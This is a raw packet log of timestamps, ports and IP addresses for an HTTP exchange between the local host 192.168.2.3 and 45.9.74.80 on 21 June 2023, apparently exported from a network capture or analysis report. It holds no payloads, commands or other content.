Jun 21, 2023 04:27:58.019742966 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.019802094 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.019814014 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.019880056 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.019934893 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.019956112 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.019993067 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.020049095 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.020103931 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.020104885 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.020164013 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.020212889 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.020216942 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.020296097 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.020351887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.020370007 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.020406961 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.020407915 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.020463943 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.020519972 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.020522118 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.020581007 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.020632029 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.020637035 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.020694017 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.020747900 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.020761967 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.020804882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.020854950 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.020862103 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.020919085 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.020971060 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.020972967 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.021018982 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.021028042 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.021084070 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.021133900 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.021140099 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.021194935 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.021245003 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.021254063 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.021326065 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.021382093 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.021430969 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.021439075 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.021495104 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.021543980 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.021553040 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.021610022 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.046895981 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.046978951 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.047039032 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.047091961 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.047149897 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.047149897 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.047153950 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.047213078 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.047269106 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.047270060 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.047324896 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.047379017 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.047389030 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.047436953 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.047491074 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.047549963 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.047550917 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.047607899 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.047666073 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.047667027 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.047724962 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.047727108 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.047786951 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.047842026 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.047844887 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.047899008 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.047955036 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.047954082 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.048012018 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.048068047 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.048069000 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.048122883 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.048186064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.048286915 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.048302889 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.048361063 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.048362970 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.048432112 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.048489094 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.048499107 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.048548937 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.048607111 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.048621893 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.048661947 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.048717022 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.048769951 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.048772097 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.048824072 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.048878908 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.048886061 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.048930883 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.048934937 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.048989058 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.049041986 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.049050093 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.049097061 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.049149036 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.049150944 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.049210072 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.049264908 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.049318075 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.049318075 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.049371958 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.049424887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.049479008 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.049530029 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.049534082 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.049588919 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.049598932 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.049644947 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.049698114 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.049712896 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.049755096 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.049808025 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.049818039 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.049864054 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.049916983 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.049969912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.049971104 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.050026894 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.050086021 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.050086021 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.050139904 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.050144911 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.050201893 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.050252914 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.050257921 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.050317049 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.050375938 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.050380945 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.050432920 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.050488949 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.050512075 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.050546885 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.050601006 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.050654888 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.050667048 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.050710917 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.050761938 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.050798893 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.050823927 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.050841093 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.050883055 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.050939083 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.050996065 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.051000118 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.051050901 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.051104069 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.051105976 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.051158905 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.051160097 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.051215887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.051270962 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.051271915 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.051326036 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.051378965 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.051379919 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.051434994 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.051492929 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.051556110 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.051568985 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.051628113 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.051681042 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.051682949 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.051737070 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.051795006 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.051805019 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.051872015 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.051877022 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.051933050 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.052004099 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.052059889 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.052078962 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.052117109 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.052174091 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.052326918 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.052419901 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.077662945 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.077749014 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.077804089 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.077852011 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.077915907 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.077970982 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.077980042 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.077980042 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.078032017 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.078092098 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.078150034 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.078180075 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.078211069 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.078336000 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.078344107 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.078394890 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.078453064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.078509092 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.078515053 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.078567982 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.078627110 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.078635931 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.078686953 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.078692913 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.078744888 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.078802109 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.078804970 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.078860044 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.078911066 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.078928947 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.078977108 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.079034090 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.079077959 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.079108000 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.079147100 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.079204082 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.079220057 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.079261065 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.079269886 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.079320908 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.079372883 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.079379082 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.079436064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.079488039 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.079493999 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.079560995 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.079632044 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.079687119 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.079691887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.079751015 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.079802036 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.079808950 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.079855919 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.079866886 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.079925060 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.079977989 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.079982042 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.080039024 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.080095053 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.080100060 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.080152035 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.080209970 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.080291986 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.080296993 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.080353022 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.080383062 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.080413103 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.080471039 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.080523014 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.080527067 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.080583096 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.080640078 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.080640078 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.080688953 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.080698967 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.080754995 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.080807924 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.080811977 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.080868959 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.080923080 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.080923080 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.080981970 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.081038952 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.081094980 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.081098080 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.081151962 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.081208944 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.081213951 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.081264019 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.081264973 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.081321001 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.081376076 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.081377983 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.081434011 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.081489086 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.081496954 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.081547022 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.081603050 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.081657887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.081657887 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.081717968 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.081773043 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.081773043 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.081825018 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.081830025 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.081886053 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.081937075 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.081940889 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.081996918 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.082051992 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.082051992 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.082109928 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.082165956 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.082168102 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.082221985 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.082278013 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.082333088 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.082340956 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.082390070 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.082441092 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.082447052 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.082505941 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.082528114 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.082566977 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.082623005 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.082679033 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.082679033 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.082735062 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.082788944 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.082792044 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.082840919 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.082851887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.082906961 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.082956076 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.082962990 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.083019972 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.083082914 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.106395960 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.108562946 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.108650923 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.108697891 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.108736992 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.108757019 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.108824015 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.108890057 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.108897924 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.108967066 CEST	80	49719	45.9.74.80	192.168.2.3
